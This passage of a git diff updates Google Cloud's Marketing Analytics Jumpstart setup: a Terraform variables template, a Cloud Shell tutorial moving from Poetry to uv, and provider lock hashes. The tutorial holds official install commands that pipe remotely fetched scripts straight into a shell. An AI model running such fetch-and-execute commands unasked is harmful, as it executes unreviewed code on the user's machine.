+[![Open in Cloud Shell](https://gstatic.com/cloudssh/images/open-btn.svg)](https://shell.cloud.google.com/cloudshell/editor?cloudshell_git_repo=https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart.git&cloudshell_git_branch=main&cloudshell_workspace=&cloudshell_tutorial=infrastructure/cloudshell/tutorial.md) +**Note:** If you are working from a forked repository, be sure to update the `cloudshell_git_repo` parameter to the URL of your forked repository for the button link above. -## Installing the MDS, ML pipelines, the feature Store, and the activation pipeline +## Manual Installation Guide of Terraform Modules -Once all the prerequisites are met you can install these components using Terraform scripts. +Once all the permissions and data prerequisites are met, you can install these components using Terraform scripts. Follow instructions in [terraform/README.md](terraform/README.md) -## Installing Dashboards +## Looker Studio Dashboard Installation -Looker Studio Dashboards can be installed by following instructions +Looker Studio Dashboard can be installed by following instructions in [../python/lookerstudio/README.md](../python/lookerstudio/README.md) - diff --git a/infrastructure/cloudshell/terraform-template.tfvars b/infrastructure/cloudshell/terraform-template.tfvars index d014be93..34fba65f 100644 --- a/infrastructure/cloudshell/terraform-template.tfvars +++ b/infrastructure/cloudshell/terraform-template.tfvars @@ -15,30 +15,194 @@ #################### INFRA VARIABLES ################################# tf_state_project_id = "${MAJ_DEFAULT_PROJECT_ID}" +main_project_id = "${MAJ_DEFAULT_PROJECT_ID}" google_default_region = "${MAJ_DEFAULT_REGION}" -create_dev_environment = false -create_staging_environment = false -create_prod_environment = true - +deploy_dataform = true deploy_activation = true deploy_feature_store = true deploy_pipelines = true -deploy_monitoring = true +deploy_monitoring = false #################### DATA VARIABLES ################################# data_project_id = "${MAJ_MDS_PROJECT_ID}" destination_data_location = "${MAJ_MDS_DATA_LOCATION}" +property_id = "${MAJ_GA4_PROPERTY_ID}" data_processing_project_id = "${MAJ_MDS_DATAFORM_PROJECT_ID}" source_ga4_export_project_id = "${MAJ_GA4_EXPORT_PROJECT_ID}" source_ga4_export_dataset = "${MAJ_GA4_EXPORT_DATASET}" source_ads_export_data = [ { project = "${MAJ_ADS_EXPORT_PROJECT_ID}", dataset = "${MAJ_ADS_EXPORT_DATASET}", table_suffix = "${MAJ_ADS_EXPORT_TABLE_SUFFIX}" }] -#################### FEATEURE STORE VARIABLES ################################# +#################### FEATURE STORE VARIABLES ################################# feature_store_project_id = "${MAJ_FEATURE_STORE_PROJECT_ID}" +# These variables are going to become optional with future deployment +# List of comma separated events used in the lead score feature engineering e.g. (["scroll_50", "scroll_90", "view_search_results", ..]) +non_ecomm_events_list = ["scroll_50", "view_search_results"] +# A target event for the lead score propensity feature engineering e.g. 
"login" +non_ecomm_target_event = "login" + +################### PIPELINE CONFIGURATIONS ################################## + +pipeline_configuration = { + feature-creation-auto-audience-segmentation = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-audience-segmentation = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-purchase-propensity = { + execution = { + schedule = { + state = "ACTIVE" + } + } + } + feature-creation-churn-propensity = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-customer-ltv = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-aggregated-value-based-bidding = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + feature-creation-lead-score-propensity = { + execution = { + schedule = { + state = "ACTIVE" + } + } + } + value_based_bidding = { + training = { + schedule = { + state = "PAUSED" + } + } + explanation = { + schedule = { + state = "PAUSED" + } + } + } + purchase_propensity = { + training = { + schedule = { + state = "ACTIVE" + } + } + prediction = { + schedule = { + state = "ACTIVE" + } + } + } + churn_propensity = { + training = { + schedule = { + state = "PAUSED" + } + } + prediction = { + schedule = { + state = "PAUSED" + } + } + } + segmentation = { + training = { + schedule = { + state = "PAUSED" + } + } + prediction = { + schedule = { + state = "PAUSED" + } + } + } + auto_segmentation = { + training = { + schedule = { + state = "PAUSED" + } + } + prediction = { + schedule = { + state = "PAUSED" + } + } + } + propensity_clv = { + training = { + schedule = { + state = "PAUSED" + } + } + } + clv = { + training = { + schedule = { + state = "PAUSED" + } + } + prediction = { + schedule = { + state = "PAUSED" + } + } + } + lead_score_propensity = { + training = { + schedule = { + state = "ACTIVE" + } + } + prediction = { + schedule = { + state = "ACTIVE" + } + } + } + + gemini_insights = { + execution = { + schedule = { + state = "PAUSED" + } + } + } + reporting_preparation = { + execution = { + schedule = { + state = "PAUSED" + } + } + } +} #################### ML MODEL VARIABLES ################################# @@ -54,4 +218,4 @@ ga4_stream_id = "${MAJ_GA4_STREAM_ID}" project_owner_email = "${MAJ_DATAFORM_REPO_OWNER_EMAIL}" dataform_github_repo = "${MAJ_DATAFORM_GITHUB_REPO_URL}" -dataform_github_token = "GitHub access token generated for your forked dataform repo" +dataform_github_token = "${MAJ_DATAFORM_GITHUB_TOKEN}" diff --git a/infrastructure/cloudshell/tutorial.md b/infrastructure/cloudshell/tutorial.md index 964421cf..d4d2e519 100644 --- a/infrastructure/cloudshell/tutorial.md +++ b/infrastructure/cloudshell/tutorial.md @@ -3,7 +3,7 @@ ## Prerequisites Make sure you have completed all the steps under the [Prerequisites](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/tree/main/infrastructure#prerequisites) section. -## Choose your primary cloud project for MAJ +## Choose your primary cloud project for Marketing Analytics Jumpstart Set the default project id for `gcloud` @@ -12,22 +12,29 @@ export PROJECT_ID="" gcloud config set project $PROJECT_ID ``` -## Install Poetry -```sh -curl -sSL https://install.python-poetry.org | python3 - -``` -Add poetry to PATH +## Install update uv for running python scripts +Install [uv](https://docs.astral.sh/uv/) that manages the python version and dependecies for the solution. 
+ ```sh -export PATH="$HOME/.local/bin:$PATH" +curl -LsSf https://astral.sh/uv/install.sh | sh +export PATH="$HOME/.local/bin:$PATH" ``` -Verify poetry is properly installed, run: + +Check uv installation ```sh -poetry --version +uv --version ``` -Install python dependencies, run: + +## Authenticate with additional OAuth 2.0 scopes ```sh -poetry install +gcloud auth login +gcloud auth application-default login --quiet --scopes="openid,https://www.googleapis.com/auth/userinfo.email,https://www.googleapis.com/auth/cloud-platform,https://www.googleapis.com/auth/sqlservice.login,https://www.googleapis.com/auth/analytics,https://www.googleapis.com/auth/analytics.edit,https://www.googleapis.com/auth/analytics.provision,https://www.googleapis.com/auth/analytics.readonly,https://www.googleapis.com/auth/accounts.reauth" +gcloud auth application-default set-quota-project $PROJECT_ID +export GOOGLE_APPLICATION_CREDENTIALS=/Users//.config/gcloud/application_default_credentials.json ``` +**Note:** You may receive an error message informing the Cloud Resource Manager API has not been used/enabled for your project, similar to the following: +ERROR: (gcloud.auth.application-default.login) User [@.com] does not have permission to access projects instance [:testIamPermissions] (or it may not exist): Cloud Resource Manager API has not been used in project before or it is disabled. Enable it by visiting https://console.developers.google.com/apis/api/cloudresourcemanager.googleapis.com/overview?project= then retry. If you enabled this API recently, wait a few minutes for the action to propagate to our systems and retry. +On the next step, the Cloud Resource Manager API will be enabled and, then, your credentials will finally work. ## Set environment variables Run the set variable script and follow the steps to provide value for every variable: @@ -36,16 +43,29 @@ Run the set variable script and follow the steps to provide value for every vari ``` ## Create the Terraform variables file - ```sh envsubst < "${SOURCE_ROOT}/infrastructure/cloudshell/terraform-template.tfvars" > "${TERRAFORM_RUN_DIR}/terraform.tfvars" ``` Provide value for the `dataform_github_token` variable in the generated terraform.tfvars file -## Authenticate with additional OAuth 2.0 scopes + +## Review your Terraform version +Make sure you have installed terraform version is 1.9.7. We recommend you to use [tfenv](https://github.com/tfutils/tfenv) to manage your terraform version. +`Tfenv` is a version manager inspired by rbenv, a Ruby programming language version manager. +To install `tfenv`, run the following commands: +```sh +# Install via Homebrew or via Arch User Repository (AUR) +# Follow instructions on https://github.com/tfutils/tfenv +# Now, install the recommended terraform version +tfenv install 1.9.7 +tfenv use 1.9.7 +terraform --version +``` +For instance, the output on MacOS should be like: ```sh -. 
scripts/common.sh;set_application_default_credentials $(pwd);set +o nounset;set +o errexit +Terraform v1.9.7 +on darwin_amd64 ``` ## Create Terraform remote backend @@ -61,16 +81,37 @@ terraform init: terraform -chdir="${TERRAFORM_RUN_DIR}" init ``` -terraform apply: +terraform plan: ```sh -terraform -chdir="${TERRAFORM_RUN_DIR}" apply +terraform -chdir="${TERRAFORM_RUN_DIR}" plan ``` -## Create Looker Studio Dashboard -Extract the URL used to create the dashboard from the Terraform output value: +terraform validate: ```sh -echo "$(terraform -chdir=${TERRAFORM_RUN_DIR} output -raw lookerstudio_create_dashboard_url)" +terraform -chdir="${TERRAFORM_RUN_DIR}" validate ``` -1. Click on the long URL from the command output. This will take you to the copy dashboard flow in Looker Studio. -1. The copy may take a few moments to execute. If it does not, close the tab and try clicking the link again. -1. Click on the button `Edit and share` to follow through and finish the copy process. +If you run into errors, review and edit the configurations `${TERRAFORM_RUN_DIR}/terraform.tfvars` file. However, if there are still configurations errors, open a new [github issue](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/issues/). + +terraform apply: +```sh +terraform -chdir="${TERRAFORM_RUN_DIR}" apply +``` +If you don't have a successful execution of certain resources, re-run `terraform -chdir="${TERRAFORM_RUN_DIR}" apply` a few more times until all is deployed successfully. However, if there are still resources not deployed, open a new [github issue](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/issues/). + +## Resources created + +At this time, the Terraform scripts in this folder perform the following tasks: + +- Enables the APIs needed +- IAM bindings needed for the GCP services used +- Secret in GCP Secret manager for the private GitHub repo +- Dataform repository connected to the GitHub repo +- Deploys the marketing data store (MDS), feature store, ML pipelines and activation application + +## Next Steps + +Follow the [post-installation guide](./POST-INSTALLATION.md) to start you daily operations. + +It is recommended to follow the post-installation guide before deploying the Looker Studio Dashboard, because you need the data and predictions tables to exist before consuming insights in your reports. + +**The Looker Studio Dashboard deployment is a separate [step](https://github.com/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/python/lookerstudio/README.md).** diff --git a/infrastructure/terraform/.terraform.lock.hcl b/infrastructure/terraform/.terraform.lock.hcl index ece5c079..2840aece 100644 --- a/infrastructure/terraform/.terraform.lock.hcl +++ b/infrastructure/terraform/.terraform.lock.hcl @@ -2,145 +2,165 @@ # Manual edits may be lost in future updates. 
provider "registry.terraform.io/hashicorp/archive" { - version = "2.4.2" + version = "2.6.0" hashes = [ - "h1:G4v6F6Lhqlo3EKGBKEK/kJRhNcQiRrhEdUiVpBHKHOA=", - "h1:WfIjVbYA9s/uN2FwhGoiffT7CLFydy7MT1waFbt9YrY=", - "zh:08faed7c9f42d82bc3d406d0d9d4971e2d1c2d34eae268ad211b8aca57b7f758", - "zh:3564112ed2d097d7e0672378044a69b06642c326f6f1584d81c7cdd32ebf3a08", - "zh:53cd9afd223c15828c1916e68cb728d2be1cbccb9545568d6c2b122d0bac5102", - "zh:5ae4e41e3a1ce9d40b6458218a85bbde44f21723943982bca4a3b8bb7c103670", - "zh:5b65499218b315b96e95c5d3463ea6d7c66245b59461217c99eaa1611891cd2c", + "h1:Ou6XKWvpo7IYgZnrFJs5MKzMqQMEYv8Z2iHSJ2mmnFw=", + "h1:rYAubRk7UHC/fzYqFV/VHc+7VIY01ugCxauyTYCNf9E=", + "zh:29273484f7423b7c5b3f5df34ccfc53e52bb5e3d7f46a81b65908e7a8fd69072", + "zh:3cba58ec3aea5f301caf2acc31e184c55d994cc648126cac39c63ae509a14179", + "zh:55170cd17dbfdea842852c6ae2416d057fec631ba49f3bb6466a7268cd39130e", + "zh:7197db402ba35631930c3a4814520f0ebe980ae3acb7f8b5a6f70ec90dc4a388", "zh:78d5eefdd9e494defcb3c68d282b8f96630502cac21d1ea161f53cfe9bb483b3", - "zh:7f45b35a8330bebd184c2545a41782ff58240ed6ba947274d9881dd5da44b02e", - "zh:87e67891033214e55cfead1391d68e6a3bf37993b7607753237e82aa3250bb71", - "zh:de3590d14037ad81fc5cedf7cfa44614a92452d7b39676289b704a962050bc5e", - "zh:e7e6f2ea567f2dbb3baa81c6203be69f9cd6aeeb01204fd93e3cf181e099b610", - "zh:fd24d03c89a7702628c2e5a3c732c0dede56fa75a08da4a1efe17b5f881c88e2", - "zh:febf4b7b5f3ff2adff0573ef6361f09b6638105111644bdebc0e4f575373935f", + "zh:8bf7fe0915d7fb152a3a6b9162614d2ec82749a06dba13fab3f98d33c020ec4f", + "zh:8ce811844fd53adb0dabc9a541f8cb43aacfa7d8e39324e4bd3592b3428f5bfb", + "zh:bca795bca815b8ac90e3054c0a9ab1ccfb16eedbb3418f8ad473fc5ad6bf0ef7", + "zh:d9355a18df5a36cf19580748b23249de2eb445c231c36a353709f8f40a6c8432", + "zh:dc32cc32cfd8abf8752d34f2a783de0d3f7200c573b885ecb64ece5acea173b4", + "zh:ef498e20391bf7a280d0fd6fd6675621c85fbe4e92f0f517ae4394747db89bde", + "zh:f2bc5226c765b0c8055a7b6207d0fe1eb9484e3ec8880649d158827ac6ed3b22", ] } provider "registry.terraform.io/hashicorp/external" { - version = "2.3.3" + version = "2.3.4" constraints = ">= 2.2.2" hashes = [ - "h1:H+3QlVPs/7CDa3I4KU/a23wYeGeJxeBlgvR7bfK1t1w=", - "h1:Qi72kOSrEYgEt5itloFhDfmiFZ7wnRy3+F74XsRuUOw=", - "zh:03d81462f9578ec91ce8e26f887e34151eda0e100f57e9772dbea86363588239", - "zh:37ec2a20f6a3ec3a0fd95d3f3de26da6cb9534b30488bc45723e118a0911c0d8", - "zh:4eb5b119179539f2749ce9de0e1b9629d025990f062f4f4dddc161562bb89d37", - "zh:5a31bb58414f41bee5e09b939012df5b88654120b0238a89dfd6691ba197619a", - "zh:6221a05e52a6a2d4f520ffe7cbc741f4f6080e0855061b0ed54e8be4a84eb9b7", + "h1:U6W8rgrdmR2pZ2cicFoGOSQ4GXuIf/4EK7s0vTJN7is=", + "h1:XWkRZOLKMjci9/JAtE8X8fWOt7A4u+9mgXSUjc4Wuyo=", + "zh:037fd82cd86227359bc010672cd174235e2d337601d4686f526d0f53c87447cb", + "zh:0ea1db63d6173d01f2fa8eb8989f0809a55135a0d8d424b08ba5dabad73095fa", + "zh:17a4d0a306566f2e45778fbac48744b6fd9c958aaa359e79f144c6358cb93af0", + "zh:298e5408ab17fd2e90d2cd6d406c6d02344fe610de5b7dae943a58b958e76691", + "zh:38ecfd29ee0785fd93164812dcbe0664ebbe5417473f3b2658087ca5a0286ecb", + "zh:59f6a6f31acf66f4ea3667a555a70eba5d406c6e6d93c2c641b81d63261eeace", "zh:78d5eefdd9e494defcb3c68d282b8f96630502cac21d1ea161f53cfe9bb483b3", - "zh:8bb068496b4679bef625e4710d9f3432e301c3a56602271f04e60eadf7f8a94c", - "zh:94742aa5378bab626ce34f79bcef6a373e4f86ea7a8b762e9f71270a899e0d00", - "zh:a485831b5a525cd8f40e8982fa37da40ff70b1ae092c8b755fcde123f0b1238d", - "zh:a647ff16d071eabcabd87ea8183eb90a775a0294ddd735d742075d62fff09193", - 
"zh:b74710c5954aaa3faf262c18d36a8c2407862d9f842c63e7fa92fa4de3d29df6", - "zh:fa73d83edc92af2e551857594c2232ba6a9e3603ad34b0a5940865202c08d8d7", + "zh:ad0279dfd09d713db0c18469f585e58d04748ca72d9ada83883492e0dd13bd58", + "zh:c69f66fd21f5e2c8ecf7ca68d9091c40f19ad913aef21e3ce23836e91b8cbb5f", + "zh:d4a56f8c48aa86fc8e0c233d56850f5783f322d6336f3bf1916e293246b6b5d4", + "zh:f2b394ebd4af33f343835517e80fc876f79361f4688220833bc3c77655dd2202", + "zh:f31982f29f12834e5d21e010856eddd19d59cd8f449adf470655bfd19354377e", ] } provider "registry.terraform.io/hashicorp/google" { - version = "4.85.0" - constraints = ">= 3.43.0, >= 3.53.0, >= 3.63.0, >= 4.83.0, < 5.0.0, < 6.0.0" + version = "5.45.0" + constraints = ">= 3.43.0, >= 3.53.0, >= 4.83.0, >= 5.3.0, >= 5.22.0, 5.45.0, < 6.0.0, < 7.0.0" hashes = [ - "h1:OVJ7KHmd+XnpxTIRwqwXKasUha9q1rxnq6m5iiETmTM=", - "h1:aSRZcEKF2wOi/v24IA+k9J2Y7aKVV1cHi/R0V3EhxXQ=", - "zh:17d60a6a6c1741cf1e09ac6731433a30950285eac88236e623ab4cbf23832ca3", - "zh:1c70254c016439dbb75cab646b4beace6ceeff117c75d81f2cc27d41c312f752", - "zh:35e2aa2cc7ac84ce55e05bb4de7b461b169d3582e56d3262e249ff09d64fe008", - "zh:417afb08d7b2744429f6b76806f4134d62b0354acf98e8a6c00de3c24f2bb6ad", - "zh:622165d09d21d9a922c86f1fc7177a400507f2a8c4a4513114407ae04da2dd29", - "zh:7cdb8e39a8ea0939558d87d2cb6caceded9e21f21003d9e9f9ce648d5db0bc3a", - "zh:851e737dc551d6004a860a8907fda65118fc2c7ede9fa828f7be704a2a39e68f", - "zh:a331ad289a02a2c4473572a573dc389be0a604cdd9e03dd8dbc10297fb14f14d", - "zh:b67fd531251380decd8dd1f849460d60f329f89df3d15f5815849a1dd001f430", - "zh:be8785957acca4f97aa3e800b313b57d1fca07788761c8867c9bc701fbe0bdb5", - "zh:cb6579a259fe020e1f88217d8f6937b2d5ace15b6406370977a1966eb31b1ca5", + "h1:9IKgCIf3GQ0JME7w4xEtEWPQzKj9dK6VWaQGNfXhIq4=", + "h1:EE17hNaULEGzLdVIS3GC4DZj4aPyJQ78mGzkMpta41g=", + "h1:F2Wsx5YDJ5ekyuNCMXGhufgP3PxZYLEGKEBA2OAf1Dw=", + "h1:Ijl5ueA8/gIRLo9XVGaHYj5P678EBJ09e5AW1zdEGFM=", + "h1:O9Y/KFnZ9vd/fbdEN8sVUqJSwBQrnD41/gvcrq2tdjs=", + "h1:WYrT1NBB471ix+daiTUPlrv0v7iahjo+BtHow4XK20A=", + "h1:gL0Wix01r4w2MXddANosbMZPhJ424zjsNilBI74WKXM=", + "h1:kcBXXVUCtgMtfmGlocuFsDQ9ZwKv6wWieF9WGLnuzCA=", + "h1:oKwp4VjUV+imHTzU2ligRhTONMP64Vg7pO/+jOO9nog=", + "h1:uAE+iwYlGzeMoc8khSNyNbSFGJ+RTdPzzv28V0/f1TQ=", + "h1:unPNZWUQ9JCQhCFjLsvGBzO4w80wyMryr7ws3ZXkWXY=", + "zh:02916a209c660806a7ef30c3e404cd139705bdd401646791ac8876259d10d560", + "zh:3cd831a98d9de617d334be4885a253dcf7dfb54a383cf366482303fdd5fd7162", + "zh:42dfb0db08b7086f8de4f1d2f8326d3e07c99016ce6ca91f3d310458111acc97", + "zh:4a8cb3569e5006da3bc631bc340f0c6020f3d6140c4eb5821d92d0ff23fde2dd", + "zh:614e86cd8e793c8d622a869860f71dcedef783c1a72d754c8af919c1209b1f89", + "zh:7d42ec15014891c6b65c0115c2fc0e95066f71497ad9c56639f490f0922daa2c", + "zh:813d3f741280a75baea1bfb0eeaaf4c2910218bd7e3607749a1a86d89a17c4dd", + "zh:823a9133c1dc96d7069bb838438a4aa5bef1344aa9077521d129915f6371fe65", + "zh:98803e908ddf283a6967cc213b34bf0c04ba866a02a3e516db6462053625aad5", + "zh:bc47ab6583e549cd86f2fa6a69cdfdf85b795e1184b0e5e25b194bbf82377b32", + "zh:d0a8e77af1f1a1fab9f7867cc8b2b700dd988398093a7a3e3273dac6875c161a", "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", ] } provider "registry.terraform.io/hashicorp/google-beta" { - version = "4.85.0" - constraints = ">= 3.43.0, >= 4.83.0, < 5.0.0, < 6.0.0" + version = "5.45.0" + constraints = ">= 3.43.0, >= 4.83.0, 5.45.0, < 6.0.0, < 7.0.0" hashes = [ - "h1:YkCDGkP0AUZoNobLoxRnM52Pi4alYE9EFXalEu8p8E8=", - "h1:fYXttGgML+C0aEl3rkOiAyo0UizA6rz7VsvNLTw678U=", - 
"zh:40e9c7ec46955b4d79065a14185043a4ad6af8d0246715853fc5c99208b66980", - "zh:5950a9ba2f96420ea5335b543e315b1a47a705f9a9abfc53c6fec52d084eddcb", - "zh:5dfa98d32246a5d97e018f2b91b0e921cc6f061bc8591884f3b144f0d62f1c20", - "zh:628d0ca35c6d4c35077859bb0a5534c1de44f23a91e190f9c3f06f2358172e75", - "zh:6e78d54fd4de4151968149b4c3521f563a8b5c55aad423dba5968a9114b65ae4", - "zh:91c3bc443188638353285bd35b06d3a3b39b42b3b4cc0637599a430438fba2f7", - "zh:9e91b03363ebf39eea5ec0fbe7675f6979883aa9ad9a36664357d8513a007cf3", - "zh:db9a8d6bfe075fb38c260986ab557d40e8d18e5698c62956a6da8120fae01d59", - "zh:e41169c49f3bb53217905509e2ba8bb4680c373e1f54db7fac1b7f72943a1004", - "zh:f32f55a8af605afbc940814e17493ac83d9d66cd6da9bbc247e0a833a0aa37ec", + "h1:4Ug3VzAY+rejiYinoSsvisWomat2F5IpZFRb8CXRzno=", + "h1:4tLIUBTNcMxicJ89U+W4JBIYrJDbV4sDKQIUgVG/HVs=", + "h1:5NWFWsFEk30OAkbcFm1F2B5Y7KM1wUGSHUDwrTG5X1U=", + "h1:AXiaqADjiqomw0FIvP2PGR4D0am6oO6zCZ/acI//YaA=", + "h1:GJWwhG8GIwDTXEdMrmvUS24YUeqJjilWPKHSjfzqZ78=", + "h1:Nf7L8JCTfl6xqc4eTuMcmOZVbubuGRZ0r0JIzR3jSgo=", + "h1:OcHA9U65zEiu9JCJ3cbQ9Y2Flo8I+swaw3QHmrZ04Yo=", + "h1:WIl5hWBy0sM0Op4dguxXNaoiT9s+sY5DwbXKktMwBwA=", + "h1:YIkw3tr1L4958Q+eVY7mFL34hFefIMAI82jhJqYuT24=", + "h1:duMh4JmMbG1JOrJWuY1RWCITPHBH6QJwMuewBT5LzoU=", + "h1:hilteO1YL4/igM7wvzhJzVa/37cgrx7GRLxe7vP2Bsg=", + "zh:1320129b0f6d2de7c0245d76118d83c7cdd052bee4a0234eb40fe000c3c0227b", + "zh:18592f31650e697c25f42a6ec26c79f7da5406c92330593242584ade57040b87", + "zh:1c2dd6050c9cfc4e690de056dcf58b262ea7f85abfbe4b60ee44dd360ff2a1b2", + "zh:560d9398296e52bfd64ada49f4c4ad120d5e98b1d0d75b103b78213d66df3c03", + "zh:7ce05dd2026c6ba6c3ee232cb1d66da5e472f5f77b8a0b0c44e854c37d06eff8", + "zh:7ffa5c7ccc53d5dd910cadd8c24ab78641080fe07b4c08eb714f98d46f1aa710", + "zh:9e429cf5c48bf7260add3cf7515d59cb25154cc5b36edeee0515dffeecf2d79e", + "zh:a2a54c710870bcb4ed614842271284eef6574d2eb618dc5162db4208d3014375", + "zh:b69ba5e5539699dcd4f9fdbb4d2e424b93137bf1fc5b812cbe18d823b0f09fea", + "zh:d26415fb70b8c3c9a2596f4244b8a2983a9b024bb54d85ccd87f348a7802545c", + "zh:d538686883e77e63ee01bcfe09076709cfdf95ce58277645d43695b1d880f467", "zh:f569b65999264a9416862bca5cd2a6177d94ccb0424f3a4ef424428912b9cb3c", - "zh:f6561a6badc3af842f9ad5bb926104954047f07cb90fadcca1357441cc67d91d", ] } provider "registry.terraform.io/hashicorp/local" { - version = "2.5.1" + version = "2.5.2" hashes = [ - "h1:8oTPe2VUL6E2d3OcrvqyjI4Nn/Y/UEQN26WLk5O/B0g=", - "h1:tjcGlQAFA0kmQ4vKkIPPUC4it1UYxLbg4YvHOWRAJHA=", - "zh:0af29ce2b7b5712319bf6424cb58d13b852bf9a777011a545fac99c7fdcdf561", - "zh:126063ea0d79dad1f68fa4e4d556793c0108ce278034f101d1dbbb2463924561", - "zh:196bfb49086f22fd4db46033e01655b0e5e036a5582d250412cc690fa7995de5", - "zh:37c92ec084d059d37d6cffdb683ccf68e3a5f8d2eb69dd73c8e43ad003ef8d24", - "zh:4269f01a98513651ad66763c16b268f4c2da76cc892ccfd54b401fff6cc11667", - "zh:51904350b9c728f963eef0c28f1d43e73d010333133eb7f30999a8fb6a0cc3d8", - "zh:73a66611359b83d0c3fcba2984610273f7954002febb8a57242bbb86d967b635", + "h1:JlMZD6nYqJ8sSrFfEAH0Vk/SL8WLZRmFaMUF9PJK5wM=", + "h1:p99F1AoV9z51aJ4EdItxz/vLwWIyhx/0Iw7L7sWSH1o=", + "zh:136299545178ce281c56f36965bf91c35407c11897f7082b3b983d86cb79b511", + "zh:3b4486858aa9cb8163378722b642c57c529b6c64bfbfc9461d940a84cd66ebea", + "zh:4855ee628ead847741aa4f4fc9bed50cfdbf197f2912775dd9fe7bc43fa077c0", + "zh:4b8cd2583d1edcac4011caafe8afb7a95e8110a607a1d5fb87d921178074a69b", + "zh:52084ddaff8c8cd3f9e7bcb7ce4dc1eab00602912c96da43c29b4762dc376038", + "zh:71562d330d3f92d79b2952ffdda0dad167e952e46200c767dd30c6af8d7c0ed3", 
"zh:78d5eefdd9e494defcb3c68d282b8f96630502cac21d1ea161f53cfe9bb483b3", - "zh:7ae387993a92bcc379063229b3cce8af7eaf082dd9306598fcd42352994d2de0", - "zh:9e0f365f807b088646db6e4a8d4b188129d9ebdbcf2568c8ab33bddd1b82c867", - "zh:b5263acbd8ae51c9cbffa79743fbcadcb7908057c87eb22fd9048268056efbc4", - "zh:dfcd88ac5f13c0d04e24be00b686d069b4879cc4add1b7b1a8ae545783d97520", + "zh:805f81ade06ff68fa8b908d31892eaed5c180ae031c77ad35f82cb7a74b97cf4", + "zh:8b6b3ebeaaa8e38dd04e56996abe80db9be6f4c1df75ac3cccc77642899bd464", + "zh:ad07750576b99248037b897de71113cc19b1a8d0bc235eb99173cc83d0de3b1b", + "zh:b9f1c3bfadb74068f5c205292badb0661e17ac05eb23bfe8bd809691e4583d0e", + "zh:cc4cbcd67414fefb111c1bf7ab0bc4beb8c0b553d01719ad17de9a047adff4d1", ] } provider "registry.terraform.io/hashicorp/null" { - version = "3.2.2" + version = "3.2.3" + constraints = ">= 2.1.0" hashes = [ - "h1:vWAsYRd7MjYr3adj8BVKRohVfHpWQdvkIwUQ2Jf5FVM=", - "h1:zT1ZbegaAYHwQa+QwIFugArWikRJI9dqohj8xb0GY88=", - "zh:3248aae6a2198f3ec8394218d05bd5e42be59f43a3a7c0b71c66ec0df08b69e7", - "zh:32b1aaa1c3013d33c245493f4a65465eab9436b454d250102729321a44c8ab9a", - "zh:38eff7e470acb48f66380a73a5c7cdd76cc9b9c9ba9a7249c7991488abe22fe3", - "zh:4c2f1faee67af104f5f9e711c4574ff4d298afaa8a420680b0cb55d7bbc65606", - "zh:544b33b757c0b954dbb87db83a5ad921edd61f02f1dc86c6186a5ea86465b546", - "zh:696cf785090e1e8cf1587499516b0494f47413b43cb99877ad97f5d0de3dc539", - "zh:6e301f34757b5d265ae44467d95306d61bef5e41930be1365f5a8dcf80f59452", + "h1:+AnORRgFbRO6qqcfaQyeX80W0eX3VmjadjnUFUJTiXo=", + "h1:nKUqWEza6Lcv3xRlzeiRQrHtqvzX1BhIzjaOVXRYQXQ=", + "zh:22d062e5278d872fe7aed834f5577ba0a5afe34a3bdac2b81f828d8d3e6706d2", + "zh:23dead00493ad863729495dc212fd6c29b8293e707b055ce5ba21ee453ce552d", + "zh:28299accf21763ca1ca144d8f660688d7c2ad0b105b7202554ca60b02a3856d3", + "zh:55c9e8a9ac25a7652df8c51a8a9a422bd67d784061b1de2dc9fe6c3cb4e77f2f", + "zh:756586535d11698a216291c06b9ed8a5cc6a4ec43eee1ee09ecd5c6a9e297ac1", "zh:78d5eefdd9e494defcb3c68d282b8f96630502cac21d1ea161f53cfe9bb483b3", - "zh:913a929070c819e59e94bb37a2a253c228f83921136ff4a7aa1a178c7cce5422", - "zh:aa9015926cd152425dbf86d1abdbc74bfe0e1ba3d26b3db35051d7b9ca9f72ae", - "zh:bb04798b016e1e1d49bcc76d62c53b56c88c63d6f2dfe38821afef17c416a0e1", - "zh:c23084e1b23577de22603cff752e59128d83cfecc2e6819edadd8cf7a10af11e", + "zh:9d5eea62fdb587eeb96a8c4d782459f4e6b73baeece4d04b4a40e44faaee9301", + "zh:a6355f596a3fb8fc85c2fb054ab14e722991533f87f928e7169a486462c74670", + "zh:b5a65a789cff4ada58a5baffc76cb9767dc26ec6b45c00d2ec8b1b027f6db4ed", + "zh:db5ab669cf11d0e9f81dc380a6fdfcac437aea3d69109c7aef1a5426639d2d65", + "zh:de655d251c470197bcbb5ac45d289595295acb8f829f6c781d4a75c8c8b7c7dd", + "zh:f5c68199f2e6076bce92a12230434782bf768103a427e9bb9abee99b116af7b5", ] } provider "registry.terraform.io/hashicorp/random" { - version = "3.6.2" + version = "3.6.3" + constraints = ">= 2.1.0" hashes = [ - "h1:R5qdQjKzOU16TziCN1vR3Exr/B+8WGK80glLTT4ZCPk=", - "h1:wmG0QFjQ2OfyPy6BB7mQ57WtoZZGGV07uAPQeDmIrAE=", - "zh:0ef01a4f81147b32c1bea3429974d4d104bbc4be2ba3cfa667031a8183ef88ec", - "zh:1bcd2d8161e89e39886119965ef0f37fcce2da9c1aca34263dd3002ba05fcb53", - "zh:37c75d15e9514556a5f4ed02e1548aaa95c0ecd6ff9af1119ac905144c70c114", - "zh:4210550a767226976bc7e57d988b9ce48f4411fa8a60cd74a6b246baf7589dad", - "zh:562007382520cd4baa7320f35e1370ffe84e46ed4e2071fdc7e4b1a9b1f8ae9b", - "zh:5efb9da90f665e43f22c2e13e0ce48e86cae2d960aaf1abf721b497f32025916", - "zh:6f71257a6b1218d02a573fc9bff0657410404fb2ef23bc66ae8cd968f98d5ff6", + "h1:Fnaec9vA8sZ8BXVlN3Xn9Jz3zghSETIKg7ch8oXhxno=", + 
